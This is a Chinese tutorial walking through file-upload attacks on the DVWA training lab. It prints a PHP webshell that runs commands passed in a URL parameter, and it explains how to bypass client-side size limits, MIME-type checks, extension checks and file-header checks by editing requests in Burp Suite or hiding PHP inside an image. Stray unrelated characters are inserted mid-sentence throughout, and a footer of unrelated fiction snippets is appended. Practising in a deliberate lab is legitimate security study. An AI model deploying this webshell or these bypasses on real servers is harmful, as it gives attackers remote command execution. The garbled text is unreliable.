文章目錄
1.上傳正常圖片
2.上傳webshell
3.突破文件大小限制
4.medium中安全級(jí)別upload測(cè)試
5.high高安全級(jí)別upload測(cè)試
6.文件頭繞過(guò)過(guò)濾上傳webshell
7.防范文件上傳方法
1孟抗、上傳正常圖片
首先,按照正常的上傳流程钻心,上傳圖片凄硼,并通過(guò)burpsuite觀察上傳過(guò)程
通過(guò)burpsuite,看到上傳過(guò)程中捷沸,由于有多個(gè)表單mulitpart/form-data即多個(gè)變量摊沉,因此使用boundary作為邊界分隔:
通過(guò)在訪問(wèn)后面加上
../../hackable/uploads/1.jpg路徑 ,查看上傳的圖片
2痒给、上傳webshell
由于在low級(jí)別沒(méi)有對(duì)文件進(jìn)行任何限制说墨,因此可以嘗試上傳一段webshell代碼骏全,看能否執(zhí)行成功:
將下面代碼命名為1.php并上傳
<?php echo shell_exec($_GET['cmd']);?> //讀取cmd變量值,并交由shell_exec函數(shù)執(zhí)行尼斧,并將執(zhí)行的結(jié)果通過(guò)echo顯示在頁(yè)面中
上傳1.php文件
將../../hackable/uploads/1.php放在訪問(wèn)路徑后面姜贡,然后在使用連接符?加上cmd要使用的執(zhí)行命令
3棺棵、突破文件大小限制
通過(guò)上面的burpsuite楼咳,可以看到對(duì)于文件的大小是有限制的,限定在100k
在默認(rèn)情況下烛恤,上傳2.php不能成功母怜,原因是2.php的大小為176k大于默認(rèn)的100k
下面,如果將其進(jìn)行修改棒动,并且上傳一個(gè)比較大的文件(超過(guò)100k)糙申,是否能夠成功:
開(kāi)始截?cái)喙δ鼙鎏恚?00000修改為1000000船惨,然后在forward
通過(guò)上述描述,可以看到基于客戶端的大小限制是能夠被繞過(guò)的缕陕,應(yīng)用程序不僅要在客戶端進(jìn)行校驗(yàn)限制粱锐,而且也要在服務(wù)端進(jìn)行校驗(yàn)限制。
4扛邑、medium中安全級(jí)別upload測(cè)試
文件mime-type類型查看:文件頭和擴(kuò)展名
將安全級(jí)別設(shè)置為“medium”怜浅,然后查看源代碼,發(fā)現(xiàn)服務(wù)端對(duì)文件的mimetype類型(須為image/jpeg)蔬崩、文件大卸褡(100k)進(jìn)行了限制。
下面將1.php在重新上傳(將此前的上傳先刪除/var/www/dvwa/hackable/uploads/)沥阳,并通過(guò)代理截?cái)鄬imetype類型修改為image/jpeg跨琳,并forward:
5、high高安全級(jí)別upload測(cè)試
將安全級(jí)別設(shè)置為“high”桐罕,查看源代碼脉让,發(fā)現(xiàn)對(duì)文件的擴(kuò)展名進(jìn)行了校驗(yàn),只允許jpg/JPG功炮、jpeg/JPEG
使用代理截?cái)嘟η保瑢?duì)擴(kuò)展名進(jìn)行修改,看能否繞過(guò)
6薪伏、文件頭繞過(guò)過(guò)濾上傳webshell
對(duì)于除了判斷擴(kuò)展名滚澜,應(yīng)用程序可以還可以通過(guò)文件中的文件頭進(jìn)行判斷,文件頭用于定義文件的類型嫁怀,比如下面的原始圖片设捐,body中的png定義的是圖片:
但卻可以將下面的圖片(亂碼部分)使用php代碼進(jìn)行替換潦牛,這樣就達(dá)到了即使對(duì)文件頭進(jìn)行校驗(yàn),仍然是png挡育,但是執(zhí)行代碼卻在body中可以執(zhí)行巴碗。
由于圖片是靜態(tài)文件,因此將filename改為1.php.jpg
查看上傳結(jié)果
驗(yàn)證結(jié)果:
7即寒、防范文件上傳方法
安全配置橡淆、安全編碼、上傳目錄權(quán)限設(shè)置
- 文/潘曉璐 我一進(jìn)店門(mén)凶朗,熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái)瓷胧,“玉大人,你說(shuō)我怎么就攤上這事棚愤〈晗簦” “怎么了?”我有些...
- 文/不壞的土叔 我叫張陵宛畦,是天一觀的道長(zhǎng)瘸洛。 經(jīng)常有香客問(wèn)我,道長(zhǎng)次和,這世上最難降的妖魔是什么反肋? 我笑而不...
- 正文 為了忘掉前任,我火速辦了婚禮斯够,結(jié)果婚禮上囚玫,老公的妹妹穿的比我還像新娘。我一直安慰自己读规,他們只是感情好抓督,可當(dāng)我...
- 文/花漫 我一把揭開(kāi)白布。 她就那樣靜靜地躺著束亏,像睡著了一般铃在。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上,一...
- 那天定铜,我揣著相機(jī)與錄音阳液,去河邊找鬼。 笑死揣炕,一個(gè)胖子當(dāng)著我的面吹牛帘皿,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播畸陡,決...
- 文/蒼蘭香墨 我猛地睜開(kāi)眼鹰溜,長(zhǎng)吁一口氣:“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼!你這毒婦竟也來(lái)了丁恭?” 一聲冷哼從身側(cè)響起曹动,我...
- 序言:老撾萬(wàn)榮一對(duì)情侶失蹤,失蹤者是張志新(化名)和其女友劉穎牲览,沒(méi)想到半個(gè)月后墓陈,有當(dāng)?shù)厝嗽跇?shù)林里發(fā)現(xiàn)了一具尸體,經(jīng)...
- 正文 獨(dú)居荒郊野嶺守林人離奇死亡第献,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
- 正文 我和宋清朗相戀三年贡必,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片痊硕。...
- 正文 年R本政府宣布,位于F島的核電站灯谣,受9級(jí)特大地震影響,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜刚盈,卻給世界環(huán)境...
- 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望挂脑。 院中可真熱鬧藕漱,春花似錦、人聲如沸崭闲。這莊子的主人今日做“春日...
- 文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)刁俭。三九已至橄仍,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背侮繁。 一陣腳步聲響...
- 正文 我出身青樓娩贷,卻偏偏與公主長(zhǎng)得像,于是被迫代替她去往敵國(guó)和親锁孟。 傳聞我的和親對(duì)象是個(gè)殘疾皇子育勺,可洞房花燭夜當(dāng)晚...
推薦閱讀更多精彩內(nèi)容
- 米斯特白帽培訓(xùn)講義 漏洞篇 文件上傳 講師:gh0stkey 整理:飛龍 協(xié)議:CC BY-NC-SA 4.0 我...
- http://tieba.baidu.com/p/2310282657 什么是”遠(yuǎn)程文件包含漏洞”涧至?服務(wù)器通過(guò)ph...
- 轉(zhuǎn)載自cr180大神DiscuzX2.5完整目錄結(jié)構(gòu)【source程序文件庫(kù)】 /source/admincp后臺(tái)...
- 《明心寶鑒》里有一段話:心安茅屋穩(wěn)南蓬,性定菜根香。世事靜方見(jiàn)哑了,人情淡始長(zhǎng)赘方。心若不安,人就永遠(yuǎn)不會(huì)有“穩(wěn)”的感覺(jué)弱左;而心...
